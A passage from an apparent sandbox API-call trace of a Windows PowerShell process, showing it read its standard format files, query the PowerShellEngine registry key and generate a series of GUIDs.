	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.538] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.539] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.539] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.539] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.539] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.540] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.540] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.540] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.540] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.541] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.541] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.541] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.541] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.542] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0xe67, lpOverlapped=0x0) returned 1
	[0482.542] ReadFile (in: hFile=0x30c, lpBuffer=0x30e13cf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e13cf*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0482.542] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0482.542] CloseHandle (hObject=0x30c) returned 1
	[0482.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0482.543] SetErrorMode (uMode=0x1) returned 0x1
	[0482.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0482.543] SetErrorMode (uMode=0x1) returned 0x1
	[0482.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0482.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
	[0482.543] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0482.543] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0482.543] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0482.543] CoTaskMemFree (pv=0x46ea70) 
	[0483.323] RegCloseKey (hKey=0x30c) returned 0x0
	[0483.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0483.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0483.324] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xdeefa021, Data2=0xf7f0, Data3=0x4d1e, Data4=([0]=0xba, [1]=0x97, [2]=0x2c, [3]=0x9b, [4]=0x8a, [5]=0xef, [6]=0x61, [7]=0xab))) returned 0x0
	[0483.325] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x758a1337, Data2=0x4dc7, Data3=0x40ac, Data4=([0]=0xa2, [1]=0x5c, [2]=0xc0, [3]=0x5e, [4]=0xd8, [5]=0xf5, [6]=0xb3, [7]=0xa9))) returned 0x0
	[0483.325] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xf982abc4, Data2=0xf62d, Data3=0x471e, Data4=([0]=0xb4, [1]=0x54, [2]=0xca, [3]=0xab, [4]=0xac, [5]=0xad, [6]=0xd7, [7]=0x9f))) returned 0x0
	[0483.325] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa336d16f, Data2=0x86de, Data3=0x40bc, Data4=([0]=0x8b, [1]=0x3f, [2]=0x84, [3]=0x9, [4]=0x54, [5]=0xf6, [6]=0x98, [7]=0x69))) returned 0x0
	[0483.325] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x38b31707, Data2=0x57e4, Data3=0x40cc, Data4=([0]=0xa7, [1]=0xc5, [2]=0x1, [3]=0x56, [4]=0xb6, [5]=0x47, [6]=0xaa, [7]=0x3))) returned 0x0
	[0483.325] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa22701e9, Data2=0x38f, Data3=0x49e1, Data4=([0]=0xa6, [1]=0x3f, [2]=0x1d, [3]=0x2f, [4]=0x63, [5]=0xff, [6]=0x97, [7]=0x94))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xc61be499, Data2=0xf402, Data3=0x474b, Data4=([0]=0x82, [1]=0x44, [2]=0xa5, [3]=0x1c, [4]=0xfa, [5]=0x98, [6]=0x38, [7]=0x67))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x6a4b31eb, Data2=0x86c8, Data3=0x448e, Data4=([0]=0xae, [1]=0xcf, [2]=0xac, [3]=0x9, [4]=0xaa, [5]=0x7d, [6]=0xec, [7]=0xf8))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5cafe0b, Data2=0x4221, Data3=0x4a21, Data4=([0]=0x8e, [1]=0x30, [2]=0xba, [3]=0x6a, [4]=0xff, [5]=0x31, [6]=0x4, [7]=0x72))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x62b9410e, Data2=0x1688, Data3=0x4fe3, Data4=([0]=0xa5, [1]=0xe4, [2]=0x56, [3]=0x95, [4]=0xfd, [5]=0x3e, [6]=0xcc, [7]=0x7e))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xd23fd5f9, Data2=0x6258, Data3=0x48dd, Data4=([0]=0x8e, [1]=0x69, [2]=0x8e, [3]=0x45, [4]=0x16, [5]=0x5, [6]=0x33, [7]=0x1a))) returned 0x0
	[0483.326] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xe3240fee, Data2=0x8cd6, Data3=0x4a75, Data4=([0]=0xa5, [1]=0x55, [2]=0x58, [3]=0x15, [4]=0xf0, [5]=0x78, [6]=0x6c, [7]=0x10))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5bf9471f, Data2=0x4e69, Data3=0x4dcb, Data4=([0]=0xb4, [1]=0x4a, [2]=0xbf, [3]=0x92, [4]=0x48, [5]=0x1f, [6]=0xc, [7]=0x66))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x71d8e92a, Data2=0xf89e, Data3=0x4a91, Data4=([0]=0x80, [1]=0xfe, [2]=0xb7, [3]=0xa2, [4]=0x6e, [5]=0xd7, [6]=0x7a, [7]=0x44))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x7b9b463a, Data2=0xb3c2, Data3=0x48b1, Data4=([0]=0xbc, [1]=0x6d, [2]=0x2, [3]=0x15, [4]=0x82, [5]=0xfd, [6]=0x9b, [7]=0x2a))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xf8ecb8db, Data2=0x2065, Data3=0x4a8f, Data4=([0]=0xa2, [1]=0x49, [2]=0x95, [3]=0x7b, [4]=0xfa, [5]=0x9, [6]=0x30, [7]=0x36))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x8001bff2, Data2=0xa4e9, Data3=0x4764, Data4=([0]=0xac, [1]=0x17, [2]=0xac, [3]=0x32, [4]=0xe6, [5]=0x57, [6]=0x6f, [7]=0x34))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x7e29a58a, Data2=0xc88f, Data3=0x479d, Data4=([0]=0xa1, [1]=0x2a, [2]=0x39, [3]=0x4e, [4]=0x4f, [5]=0x46, [6]=0x5, [7]=0xb2))) returned 0x0
	[0483.327] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xeb53f84c, Data2=0x8b8d, Data3=0x4912, Data4=([0]=0x81, [1]=0x74, [2]=0x91, [3]=0xa0, [4]=0xc3, [5]=0xe9, [6]=0xc3, [7]=0xf6))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xae9810e0, Data2=0x361c, Data3=0x4dc3, Data4=([0]=0xb6, [1]=0x3, [2]=0x68, [3]=0x7f, [4]=0x7d, [5]=0x6f, [6]=0x85, [7]=0xa9))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xfe926b6d, Data2=0xef57, Data3=0x4673, Data4=([0]=0x85, [1]=0xbb, [2]=0xbb, [3]=0x83, [4]=0xf9, [5]=0x33, [6]=0x84, [7]=0xc5))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x76b66cec, Data2=0x2503, Data3=0x421b, Data4=([0]=0xb6, [1]=0x3a, [2]=0x71, [3]=0x75, [4]=0x34, [5]=0xb0, [6]=0xd4, [7]=0x23))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x42cbdf80, Data2=0x3f08, Data3=0x4d38, Data4=([0]=0x88, [1]=0x39, [2]=0xb9, [3]=0x6d, [4]=0x1d, [5]=0xf8, [6]=0x54, [7]=0x9))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x98446364, Data2=0x7055, Data3=0x46ee, Data4=([0]=0xa9, [1]=0x72, [2]=0xab, [3]=0xdd, [4]=0x81, [5]=0x84, [6]=0xf4, [7]=0x43))) returned 0x0
	[0483.328] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x44e3b11a, Data2=0xe79d, Data3=0x4200, Data4=([0]=0x90, [1]=0xea, [2]=0xe8, [3]=0xb, [4]=0xc5, [5]=0x8e, [6]=0x7d, [7]=0x4a))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5c2da93, Data2=0xeb54, Data3=0x4359, Data4=([0]=0xb0, [1]=0xcc, [2]=0x1e, [3]=0xc5, [4]=0xc5, [5]=0x46, [6]=0xc0, [7]=0xf4))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x592c2dac, Data2=0x22fa, Data3=0x48b1, Data4=([0]=0xa0, [1]=0xc2, [2]=0xbc, [3]=0x81, [4]=0x3a, [5]=0x6b, [6]=0x17, [7]=0x51))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xe8526e0d, Data2=0xc03c, Data3=0x418b, Data4=([0]=0xbd, [1]=0xc7, [2]=0xb4, [3]=0xff, [4]=0xf0, [5]=0x82, [6]=0xea, [7]=0x14))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x9a6de8ee, Data2=0x338c, Data3=0x461f, Data4=([0]=0xb5, [1]=0xc0, [2]=0x88, [3]=0xf4, [4]=0xb7, [5]=0x68, [6]=0x3c, [7]=0xa4))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x25c3290e, Data2=0x3fbc, Data3=0x40f6, Data4=([0]=0xaf, [1]=0xb2, [2]=0x7f, [3]=0xc3, [4]=0x53, [5]=0x49, [6]=0x45, [7]=0xb7))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xb275297f, Data2=0x22e8, Data3=0x4090, Data4=([0]=0x94, [1]=0xba, [2]=0x6e, [3]=0x85, [4]=0x3e, [5]=0xb8, [6]=0xd4, [7]=0x8f))) returned 0x0
	[0483.329] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xf993b9f6, Data2=0xa3f3, Data3=0x4e12, Data4=([0]=0x88, [1]=0x24, [2]=0x24, [3]=0x4d, [4]=0x88, [5]=0x64, [6]=0x79, [7]=0xb2))) returned 0x0
	[0483.330] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1272b1a5, Data2=0x1d60, Data3=0x4024, Data4=([0]=0x8d, [1]=0x6, [2]=0xb7, [3]=0x94, [4]=0x65, [5]=0xf9, [6]=0xbd, [7]=0xfd))) returned 0x0
	[0483.334] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xbb843ce8, Data2=0x176f, Data3=0x4f43, Data4=([0]=0xa0, [1]=0xe0, [2]=0x7, [3]=0xba, [4]=0x4d, [5]=0xe6, [6]=0xf1, [7]=0x40))) returned 0x0
	[0483.334] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x35368084, Data2=0x42fa, Data3=0x41ac, Data4=([0]=0x8c, [1]=0x31, [2]=0x19, [3]=0x39, [4]=0x36, [5]=0xa6, [6]=0xbb, [7]=0xd))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x4698d721, Data2=0x5fd3, Data3=0x479e, Data4=([0]=0x8b, [1]=0x41, [2]=0x68, [3]=0x52, [4]=0x93, [5]=0x31, [6]=0xc1, [7]=0x81))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x70d08818, Data2=0x5569, Data3=0x4651, Data4=([0]=0x90, [1]=0xc8, [2]=0x6b, [3]=0xe8, [4]=0x2f, [5]=0xa6, [6]=0xcc, [7]=0x67))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xc57fe26e, Data2=0xedcf, Data3=0x4511, Data4=([0]=0xb1, [1]=0x8c, [2]=0xe, [3]=0x5a, [4]=0xeb, [5]=0xb4, [6]=0x8f, [7]=0x93))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x77116fa, Data2=0x5c22, Data3=0x4575, Data4=([0]=0x82, [1]=0xc3, [2]=0x89, [3]=0xf8, [4]=0xe9, [5]=0x84, [6]=0xaa, [7]=0xd4))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x94520db5, Data2=0xb702, Data3=0x4dd3, Data4=([0]=0x8e, [1]=0xd2, [2]=0x2b, [3]=0xc9, [4]=0xc1, [5]=0x21, [6]=0xd4, [7]=0x17))) returned 0x0
	[0483.335] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x8969bab3, Data2=0x46aa, Data3=0x4830, Data4=([0]=0xbe, [1]=0xa7, [2]=0x36, [3]=0xd9, [4]=0xe3, [5]=0x13, [6]=0x59, [7]=0xfe))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x842bead, Data2=0x921, Data3=0x4f7c, Data4=([0]=0x99, [1]=0x16, [2]=0xa9, [3]=0x9a, [4]=0x68, [5]=0xba, [6]=0x1, [7]=0x9b))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x66279c38, Data2=0x256b, Data3=0x432a, Data4=([0]=0xa5, [1]=0xc9, [2]=0xb, [3]=0xbb, [4]=0xc7, [5]=0x6a, [6]=0x2c, [7]=0xc2))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x83f68c2f, Data2=0xaf5e, Data3=0x4879, Data4=([0]=0x96, [1]=0x47, [2]=0xb1, [3]=0xe1, [4]=0x19, [5]=0x6a, [6]=0xcb, [7]=0xab))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5b797fe3, Data2=0xc396, Data3=0x4842, Data4=([0]=0x92, [1]=0xb5, [2]=0x6d, [3]=0xda, [4]=0x1c, [5]=0xaf, [6]=0xdd, [7]=0xcd))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xbea56c53, Data2=0x642e, Data3=0x473e, Data4=([0]=0xae, [1]=0x89, [2]=0xf, [3]=0x59, [4]=0x65, [5]=0x3, [6]=0x27, [7]=0x52))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xf2f7127c, Data2=0x6ba6, Data3=0x4529, Data4=([0]=0xa3, [1]=0x96, [2]=0xb2, [3]=0xf1, [4]=0x2f, [5]=0x38, [6]=0x2c, [7]=0xfa))) returned 0x0
	[0483.336] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x81f3baa0, Data2=0x557c, Data3=0x46d1, Data4=([0]=0x85, [1]=0x26, [2]=0x75, [3]=0xeb, [4]=0x9b, [5]=0xe9, [6]=0xfd, [7]=0xab))) returned 0x0
	[0483.337] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0483.337] GetFileType (hFile=0x30c) returned 0x1
	[0483.337] SetErrorMode (uMode=0x1) returned 0x1
	[0483.337] GetFileType (hFile=0x30c) returned 0x1
	[0483.337] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.337] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.338] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.338] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.338] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x8b4, lpOverlapped=0x0) returned 1
	[0483.338] ReadFile (in: hFile=0x30c, lpBuffer=0x323f1b4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323f1b4*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0483.338] ReadFile (in: hFile=0x30c, lpBuffer=0x323fd98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x323fd98*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0483.338] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
	[0483.338] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0483.338] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0483.339] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0483.339] CoTaskMemFree (pv=0x46ea70) 
	[0483.339] RegCloseKey (hKey=0x30c) returned 0x0
	[0483.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0483.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0483.339] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x9778b6cc, Data2=0xc7e8, Data3=0x4c93, Data4=([0]=0x9b, [1]=0x6b, [2]=0x76, [3]=0x4b, [4]=0x78, [5]=0x38, [6]=0xe2, [7]=0xdd))) returned 0x0
	[0483.339] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xb097967c, Data2=0x47f3, Data3=0x4df4, Data4=([0]=0x8f, [1]=0x4d, [2]=0x74, [3]=0x72, [4]=0x86, [5]=0x89, [6]=0xe8, [7]=0x5c))) returned 0x0
	[0483.340] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0483.340] GetFileType (hFile=0x30c) returned 0x1
	[0483.340] SetErrorMode (uMode=0x1) returned 0x1
	[0483.340] GetFileType (hFile=0x30c) returned 0x1
	[0483.340] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.340] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
